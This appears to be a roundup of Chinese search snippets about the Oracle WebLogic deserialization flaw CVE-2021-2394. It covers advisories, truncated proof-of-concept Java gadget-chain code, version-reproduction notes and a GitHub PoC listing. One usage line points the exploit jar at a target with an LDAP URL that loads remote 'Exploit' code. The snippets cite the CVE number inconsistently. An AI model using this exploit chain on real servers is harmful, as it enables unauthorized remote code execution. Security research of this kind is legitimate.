在2021年7月21日,Oracle官方 发布了一系列安全更新。涉及旗下产品(Weblogic Server、Database Server、Java SE、MySQL等)的 342 个漏洞,www.oracle.com/security-al… WebLogic Server 产品中有高危漏洞,漏洞编号为 CVE-2021-2594,CVSS 评分9.8分,影响多个 WebLogic 版本,且漏洞利用难度低,可基于 T3 和 IIOP 协...
ObjectOutputStreamobjectOutputStream=newObjectOutputStream(newFileOutputStream("poc.ser")); objectOutputStream.writeObject(attributeHolder); objectOutputStream.close(); //unserial ObjectInputStreamobjectIntputStream=newObjectInputStream(newFileInputStream("poc.ser")); objectIntputStream.readObject(); objec...
在Oracle JDK 11.0.1、8u191、7u201、6u211之后 com.sun.jndi.ldap.object.trustURLCodebase 属性的默认值被设置为false,所以此 ldap + jndi 导致 RCE 的方法失效。 在使用基于TopNAggregator.PartialResult的 poc 对官网说的版本进行复现的时候,发现 10.3.6.0.0 版本中并不存在com.tangosol.util.SortedBag和c...
POC用Timeline Sec团队的: importcom.sun.rowset.JdbcRowSetImpl;importcom.supeream.serial.Serializables;importcom.tangosol.coherence.servlet.AttributeHolder;importcom.tangosol.util.SortedBag;importcom.tangosol.util.aggregator.TopNAggregator;importoracle.eclipselink.coherence.integrated.internal.querying.FilterExtrac...
在使用基于TopNAggregator.PartialResult的 poc 对官网说的版本进行复现的时候,发现 10.3.6.0.0 版本中并不存在com.tangosol.util.SortedBag和com.tangosol.util.aggregator.TopNAggregator这两个类: 缺少SortedBag: 缺少TopNAggregator: weblogic 版本问题 使用不同 weblogic 版本的 jar 包对不同版本的 weblogic 进行测...
IIOP协议发包我是直接参考了Y4er师傅的CVE-2020-2551的POC(见参考链接),POC中提到的需要添加weblogic.jar包,我在12.2.1.3.0中测试,发现不太行,缺少一些依赖(找不到IIOP协议等错误),对比10.3.6.0的weblogic.jar包,12.2.1.3.0是缺少了挺多类的,因此我去添加了一些其他的同目录下用于数据传输的包,效果不太理想,...
编号:CVE-2021-2394Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。 这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组...
piaolin/CVE-2021-2394 main BranchesTags Code Latest commit History 3 Commits CVE_2021_2394.java README.md Reflections.java Repository files navigation README CVE-2021-2394 POC of CVE-2021-2394 免责声明 项目仅供学习使用,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责...
2021年07月21日,360CERT监测发现Oracle官方发布了2021年7月份的安全更新,本次分析报告选取的是其中一个反序列化漏洞,CVE编号为CVE-2021-2194,漏洞等级:严重,漏洞评分:9.8。 0x02 风险等级 评定方式等级 威胁等级严重 影响面广泛 攻击者价值高 利用难度低 ...
java -jar CVE_2021_2394.jar rhost rport ldapurl eg:java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit 参考链接: https://mp.weixin.qq.com/s/onoMpyenDkMmsoGEw8VO2A https://github.com/Y4er/CVE-2020-14756 https://github.com/Y4er/CVE-2020-2551 更新 ...